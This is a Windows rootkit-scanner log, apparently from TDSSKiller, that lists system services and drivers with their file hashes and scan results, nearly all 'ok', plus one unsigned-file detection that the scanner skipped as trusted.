21:56:44.0468 0x1a10 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
21:56:44.0518 0x1a10 cdrom - ok
21:56:44.0558 0x1a10 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\Windows\System32\certprop.dll
21:56:44.0638 0x1a10 CertPropSvc - ok
21:56:44.0748 0x1a10 [ 59B4AB79011957DD3B83F0C2E63741BD, 5DE68785D701DBA0F98452B7D5CC407BEECD51685F39516157733CED2EF2FA19 ] chip1click C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe
21:56:44.0978 0x1a10 chip1click - detected UnsignedFile.Multi.Generic ( 1 )
21:56:45.0538 0x1a10 Detect skipped due to KSN trusted
21:56:45.0538 0x1a10 chip1click - ok
21:56:45.0608 0x1a10 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\Windows\system32\drivers\circlass.sys
21:56:45.0688 0x1a10 circlass - ok
21:56:45.0758 0x1a10 [ 3963FEC1892368DD500E6ED1F5C286CE, A04689CB07AF1C1B4B1032B0ACAD88DA3EB03D89A575C59FE602A65E8C246138 ] CLFS C:\Windows\system32\CLFS.sys
21:56:45.0858 0x1a10 CLFS - ok
21:56:46.0058 0x1a10 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
21:56:46.0088 0x1a10 clr_optimization_v2.0.50727_32 - ok
21:56:46.0158 0x1a10 [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
21:56:46.0188 0x1a10 clr_optimization_v2.0.50727_64 - ok
21:56:46.0258 0x1a10 [ 2BA609641FA64BAB02ACD3C0095672F5, FD1FE403864F0564CA4A2F1D7415649B8FFE16F8ED33C4B44ACB21767118AD5F ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
21:56:46.0498 0x1a10 clr_optimization_v4.0.30319_32 - ok
21:56:46.0558 0x1a10 [ 7C7502CD2A2CFAB399D0D8DA95DB03E7, 4AE53B468CF597FCFD912A6EEE27E87EE4D9BC73F2A794FB5DF5DA46C1DD1289 ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
21:56:46.0628 0x1a10 clr_optimization_v4.0.30319_64 - ok
21:56:46.0678 0x1a10 [ 5C646CAC91E086F7FF53C7F2E857F263, 67AF6FBF88B7EE530A9BA53833EAFCC78BF8362E82BF81180858F1D17DFC73E6 ] CLVirtualDrive C:\Windows\system32\DRIVERS\CLVirtualDrive.sys
21:56:46.0738 0x1a10 CLVirtualDrive - ok
21:56:46.0988 0x1a10 [ 130427C3F2CA2422AE4D4FD4E1390456, 06E26081B31607974940B289EB58BE20BF3162B650583A97E742909365F6ADE7 ] clwvd C:\Windows\system32\DRIVERS\clwvd.sys
21:56:47.0008 0x1a10 clwvd - ok
21:56:47.0118 0x1a10 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\Windows\system32\drivers\CmBatt.sys
21:56:47.0178 0x1a10 CmBatt - ok
21:56:47.0198 0x1a10 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\Windows\system32\drivers\cmdide.sys
21:56:47.0228 0x1a10 cmdide - ok
21:56:47.0398 0x1a10 [ A98CED39AD91B445E2E442A9BD67E8B4, B4189DEEF1C0EE22AE983119047B1A40FFDD8F3E163DFFABD7C2706231B0B1B0 ] CNG C:\Windows\system32\Drivers\cng.sys
21:56:47.0458 0x1a10 CNG - ok
21:56:47.0508 0x1a10 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\Windows\system32\drivers\compbatt.sys
21:56:47.0538 0x1a10 Compbatt - ok
21:56:47.0578 0x1a10 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\Windows\system32\drivers\CompositeBus.sys
21:56:47.0618 0x1a10 CompositeBus - ok
21:56:47.0638 0x1a10 COMSysApp - ok
21:56:47.0668 0x1a10 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
21:56:47.0698 0x1a10 crcdisk - ok
21:56:47.0768 0x1a10 [ 48FEDBE324F1EA9417BA1D62AE863011, 2C3D84F0842237A3BF2838DDB4126807977EB36588FA669B1E6671077584EF18 ] CryptSvc C:\Windows\system32\cryptsvc.dll
21:56:47.0878 0x1a10 CryptSvc - ok
21:56:47.0948 0x1a10 [ 54DA3DFD29ED9F1619B6F53F3CE55E49, 9177C6907A983296BF188892A894B668A09FFA058FD56B50FE12940D54B0FA5E ] CSC C:\Windows\system32\drivers\csc.sys
21:56:48.0068 0x1a10 CSC - ok
21:56:48.0128 0x1a10 [ 3AB183AB4D2C79DCF459CD2C1266B043, 72B0187EBA9DC74E61EC5CB3DC24058DDB768843E865801894AAEAA211610C56 ] CscService C:\Windows\System32\cscsvc.dll
21:56:48.0208 0x1a10 CscService - ok
21:56:48.0278 0x1a10 [ 3F1A199859B4F3F8357B2A0AF5666A54, B0ACE9384088B7D0E54CF82BF48D4FEAA518BDEF98A294BA8F5A37DFF0E45328 ] DcomLaunch C:\Windows\system32\rpcss.dll
21:56:48.0388 0x1a10 DcomLaunch - ok
21:56:48.0428 0x1a10 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\Windows\System32\defragsvc.dll
21:56:48.0508 0x1a10 defragsvc - ok
21:56:48.0558 0x1a10 [ 9B38580063D281A99E68EF5813022A5F, D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA ] DfsC C:\Windows\system32\Drivers\dfsc.sys
21:56:48.0648 0x1a10 DfsC - ok
21:56:48.0698 0x1a10 [ 9593475FBC857A05D93BFF4FA7323C2B, D2A958AF5EFDC6136A6ABB7F8D5FE1F84C967E79BEA96C5BE3661A0145DEB907 ] dg_ssudbus C:\Windows\system32\DRIVERS\ssudbus.sys
21:56:48.0748 0x1a10 dg_ssudbus - ok
21:56:48.0798 0x1a10 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\Windows\system32\dhcpcore.dll
21:56:48.0868 0x1a10 Dhcp - ok
21:56:48.0968 0x1a10 [ EE9954237F15BE4DD9304D12E4D305ED, F295C9BAF20F0E669B673AFCC16B4969EE31B6A3808980DAB93D9B0F167DA3C0 ] DiagTrack C:\Windows\system32\diagtrack.dll
21:56:49.0128 0x1a10 DiagTrack - ok
21:56:49.0258 0x1a10 [ 91DF13EC831BDCFA36A7A12CD13D66B9, 5054281FE91D4BE0DB446F6F30E3D59E669185555F6C20B988DEC250713FFCED ] Disc Soft Lite Bus Service C:\projects\DAEMON Tools Lite\DiscSoftBusService.exe
21:56:49.0338 0x1a10 Disc Soft Lite Bus Service - ok
21:56:49.0398 0x1a10 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\Windows\system32\drivers\discache.sys
21:56:49.0468 0x1a10 discache - ok
21:56:49.0728 0x1a10 [ 616387BBD83372220B09DE95F4E67BBC, 5E2D5280BB775576E7CDE3FA6BDE494E183123635E5908CF7EBF1FF52966D07D ] Disk C:\Windows\system32\drivers\disk.sys
21:56:49.0778 0x1a10 Disk - ok
21:56:49.0918 0x1a10 [ 5DB085A8A6600BE6401F2B24EECB5415, 5FC5C7C1B4DB7BF6EFD0992E91DB41FD047E90D1ABA0B8F868CB72557F88FB13 ] dmvsc C:\Windows\system32\drivers\dmvsc.sys
21:56:49.0978 0x1a10 dmvsc - ok
21:56:50.0028 0x1a10 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\Windows\System32\dnsrslvr.dll
21:56:50.0098 0x1a10 Dnscache - ok
21:56:50.0178 0x1a10 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\Windows\System32\dot3svc.dll
21:56:50.0308 0x1a10 dot3svc - ok
21:56:50.0398 0x1a10 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\Windows\system32\dps.dll
21:56:50.0498 0x1a10 DPS - ok
21:56:50.0598 0x1a10 [ 26FE888505E5A945B0536AF9A2A27A6F, A6B16ED498BAFE300E1F0E0A241E3D62F7A1C5973EE775904ED14F33A2BC08A6 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
21:56:50.0678 0x1a10 drmkaud - ok
21:56:50.0728 0x1a10 [ 496C3C6BC3D930D0960C9E75AA30F4A7, 3FE0E86DA8C2C6A990BB2F1B92C22BD3483882B8D69FF8025BB68A199362C234 ] dtlitescsibus C:\Windows\system32\DRIVERS\dtlitescsibus.sys
21:56:50.0758 0x1a10 dtlitescsibus - ok
21:56:50.0848 0x1a10 [ 5CEF80AE869336376F550ECAE91E424A, 49152AC35556A5629AE7A4A762FDB2112FAD1C9CDB91E6196172809F74A3149A ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
21:56:50.0908 0x1a10 DXGKrnl - ok
21:56:50.0968 0x1a10 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll
21:56:51.0038 0x1a10 EapHost - ok
21:56:51.0328 0x1a10 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\drivers\evbda.sys
21:56:51.0688 0x1a10 ebdrv - ok
21:56:51.0748 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] EFS C:\Windows\System32\lsass.exe
21:56:51.0828 0x1a10 EFS - ok
21:56:52.0198 0x1a10 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
21:56:52.0368 0x1a10 ehRecvr - ok
21:56:52.0388 0x1a10 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe
21:56:52.0438 0x1a10 ehSched - ok
21:56:52.0488 0x1a10 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\drivers\elxstor.sys
21:56:52.0548 0x1a10 elxstor - ok
21:56:52.0608 0x1a10 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys
21:56:52.0658 0x1a10 ErrDev - ok
21:56:52.0738 0x1a10 [ 11B9D886D7AE2F2F5C6BC03D7C52FD31, CA3EB6AB127A01311DA1C7CE3A2F4C2C3E3641F45718CFCA0F8AED7235BE910D ] ESProtectionDriver C:\Windows\system32\drivers\mbae64.sys
21:56:52.0768 0x1a10 ESProtectionDriver - ok
21:56:52.0888 0x1a10 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll
21:56:52.0958 0x1a10 EventSystem - ok
21:56:53.0048 0x1a10 [ 7E45F8B117419ABA3BB26579F6E70324, 03FE86519860153E1BE571F10ACC9BA58FFB5A661C5C3EBDF3B77973BCD96C84 ] exfat C:\Windows\system32\drivers\exfat.sys
21:56:53.0148 0x1a10 exfat - ok
21:56:53.0168 0x1a10 [ 6EDFA237D25433C03F42FBFDB16BDD24, A30F89A40F7AFC475D3C2D3591FB9AFC06AE3FEBC915FDCB24ED77946FBA4E2C ] fastfat C:\Windows\system32\drivers\fastfat.sys
21:56:53.0238 0x1a10 fastfat - ok
21:56:53.0288 0x1a10 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe
21:56:53.0368 0x1a10 Fax - ok
21:56:53.0428 0x1a10 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\drivers\fdc.sys
21:56:53.0483 0x1a10 fdc - ok
21:56:53.0527 0x1a10 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll
21:56:53.0597 0x1a10 fdPHost - ok
21:56:53.0685 0x1a10 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll
21:56:53.0775 0x1a10 FDResPub - ok
21:56:53.0851 0x1a10 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
21:56:53.0898 0x1a10 FileInfo - ok
21:56:53.0953 0x1a10 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys
21:56:54.0072 0x1a10 Filetrace - ok
21:56:54.0131 0x1a10 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\drivers\flpydisk.sys
21:56:54.0186 0x1a10 flpydisk - ok
21:56:54.0269 0x1a10 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
21:56:54.0335 0x1a10 FltMgr - ok
21:56:54.0411 0x1a10 [ 785F474FB5E67E448E1931C98E8D0ABC, 911697D580CBF508A6F4A52D4F95A6976CF9A0EC3549076A8D0B5C8BD947C989 ] FontCache C:\Windows\system32\FntCache.dll
21:56:54.0602 0x1a10 FontCache - ok
21:56:54.0690 0x1a10 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
21:56:54.0775 0x1a10 FontCache3.0.0.0 - ok
21:56:54.0825 0x1a10 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys
21:56:54.0940 0x1a10 FsDepends - ok
21:56:54.0968 0x1a10 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
21:56:55.0003 0x1a10 Fs_Rec - ok
21:56:55.0065 0x1a10 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys
21:56:55.0104 0x1a10 fvevol - ok
21:56:55.0136 0x1a10 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
21:56:55.0179 0x1a10 gagp30kx - ok
21:56:55.0245 0x1a10 [ E4AE497857409127ED57562AF913A903, 262ADD713B1FBF6200550967D1F8635B55D01BBD8FA2E753536E71A4EC87867B ] gpsvc C:\Windows\System32\gpsvc.dll
21:56:55.0347 0x1a10 gpsvc - ok
21:56:55.0457 0x1a10 [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
21:56:55.0488 0x1a10 gupdate - ok
21:56:55.0560 0x1a10 [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
21:56:55.0587 0x1a10 gupdatem - ok
21:56:55.0647 0x1a10 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys
21:56:55.0756 0x1a10 hcw85cir - ok
21:56:55.0821 0x1a10 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
21:56:55.0903 0x1a10 HdAudAddService - ok
21:56:55.0957 0x1a10 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys
21:56:56.0007 0x1a10 HDAudBus - ok
21:56:56.0057 0x1a10 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\drivers\HidBatt.sys
21:56:56.0181 0x1a10 HidBatt - ok
21:56:56.0201 0x1a10 [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth C:\Windows\system32\drivers\hidbth.sys
21:56:56.0254 0x1a10 HidBth - ok
21:56:56.0278 0x1a10 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\drivers\hidir.sys
21:56:56.0322 0x1a10 HidIr - ok
21:56:56.0391 0x1a10 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\system32\hidserv.dll
21:56:56.0488 0x1a10 hidserv - ok
21:56:56.0523 0x1a10 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\drivers\hidusb.sys
21:56:56.0621 0x1a10 HidUsb - ok
21:56:56.0671 0x1a10 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll
21:56:56.0811 0x1a10 hkmsvc - ok
21:56:56.0941 0x1a10 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
21:56:57.0041 0x1a10 HomeGroupListener - ok
21:56:57.0101 0x1a10 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
21:56:57.0201 0x1a10 HomeGroupProvider - ok
21:56:57.0301 0x1a10 [ 77E81E788CC63E65272A7D247F441505, EA57947495A6FD5B6FCC06AD396AEEEEE44AA5EB924B1A4D71C81B1265120F7B ] HP Support Assistant Service C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe
21:56:57.0331 0x1a10 HP Support Assistant Service - ok
21:56:57.0441 0x1a10 [ 8B8E6BD988EAF18C1B86704BF05E5C03, 84052C116032F3DC47B0D3A7A8FC8E86DF94DDB3136C866D8FC8A3DF23209DEC ] hpdskflt C:\Windows\system32\drivers\hpdskflt.sys
21:56:57.0471 0x1a10 hpdskflt - ok
21:56:57.0571 0x1a10 [ D2946D9F020AE76E9CEF9B4A6DF838C0, C29CE594879385DA12B8EAA90B258905827B613839CCD820DE49215B68676995 ] hpqwmiex C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
21:56:57.0631 0x1a10 hpqwmiex - ok
21:56:57.0701 0x1a10 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys
21:56:57.0751 0x1a10 HpSAMD - ok
21:56:57.0801 0x1a10 [ 0865F178E272C682B0689F1AA269128D, F8CC23EA339F0C917C3948FF35BEFE10664CCFF8796954898E41F4EC1618E5E1 ] hpsrv C:\Windows\system32\Hpservice.exe
21:56:57.0831 0x1a10 hpsrv - ok
21:56:57.0881 0x1a10 [ 3C5B2067338E4EFDADE94E4A72728F23, 72E21FA1E660F9405A5E39B0F89AB21C60F20BAC13247567EF7139AC130F1897 ] HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
21:56:57.0911 0x1a10 HPWMISVC - ok
21:56:57.0981 0x1a10 [ CF5C9BD985120781200D35FD445D0BD5, 91B37F595A196542458CBBCDAD80779721D228A7030A34E55995DDBB06649248 ] HTTP C:\Windows\system32\drivers\HTTP.sys
21:56:58.0091 0x1a10 HTTP - ok
21:56:58.0141 0x1a10 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys
21:56:58.0171 0x1a10 hwpolicy - ok
21:56:58.0261 0x1a10 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
21:56:58.0471 0x1a10 i8042prt - ok
21:56:58.0531 0x1a10 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys
21:56:58.0571 0x1a10 iaStorV - ok
21:56:58.0661 0x1a10 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
21:56:58.0721 0x1a10 idsvc - ok
21:56:58.0941 0x1a10 IEEtwCollectorService - ok
21:56:58.0981 0x1a10 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\drivers\iirsp.sys
21:56:59.0031 0x1a10 iirsp - ok
21:56:59.0101 0x1a10 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll
21:56:59.0170 0x1a10 IKEEXT - ok
21:56:59.0379 0x1a10 [ 01262E2BE97708F54666E700482027DE, 7643FCFB6EBFABDD7D1A914C40FADE97DDC633C5D75BE2CADBAC61675564E5CD ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHD64.sys
21:56:59.0536 0x1a10 IntcAzAudAddService - ok
21:56:59.0597 0x1a10 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys
21:56:59.0624 0x1a10 intelide - ok
21:56:59.0660 0x1a10 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\drivers\intelppm.sys
21:56:59.0708 0x1a10 intelppm - ok
21:56:59.0739 0x1a10 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll
21:56:59.0822 0x1a10 IPBusEnum - ok
21:56:59.0860 0x1a10 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
21:56:59.0951 0x1a10 IpFilterDriver - ok
21:57:00.0041 0x1a10 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
21:57:00.0153 0x1a10 iphlpsvc - ok
21:57:00.0207 0x1a10 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys
21:57:00.0278 0x1a10 IPMIDRV - ok
21:57:00.0307 0x1a10 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys
21:57:00.0397 0x1a10 IPNAT - ok
21:57:00.0457 0x1a10 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys
21:57:00.0514 0x1a10 IRENUM - ok
21:57:00.0581 0x1a10 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys
21:57:00.0612 0x1a10 isapnp - ok
21:57:00.0654 0x1a10 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys
21:57:00.0707 0x1a10 iScsiPrt - ok
21:57:00.0738 0x1a10 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\drivers\kbdclass.sys
21:57:00.0792 0x1a10 kbdclass - ok
21:57:00.0837 0x1a10 [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid C:\Windows\system32\drivers\kbdhid.sys
21:57:00.0886 0x1a10 kbdhid - ok
21:57:00.0905 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] KeyIso C:\Windows\system32\lsass.exe
21:57:00.0938 0x1a10 KeyIso - ok
21:57:00.0983 0x1a10 [ 7635071BC8EDBC8B501F4EF2B0A82820, 276A5672196EF3990FB1A2CE646B6B92241580E1BB96BCCA3CBDC781CF42111A ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
21:57:01.0023 0x1a10 KSecDD - ok
21:57:01.0052 0x1a10 [ 033937305C234FC8215A4692193AA43E, 1E48CA1F8020F9DA0778A0F39A69C3B918CF878B152A3B38A5D3B9892154B6DB ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys
21:57:01.0091 0x1a10 KSecPkg - ok
